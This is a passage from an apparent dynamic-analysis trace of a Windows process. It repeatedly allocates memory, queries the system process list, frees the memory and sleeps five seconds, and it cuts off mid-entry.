NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.081] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.088] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.096] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.103] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.110] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.117] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.124] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.139] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.146] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.155] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.165] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.215] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.230] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.238] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.245] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.251] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.258] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.264] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.271] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 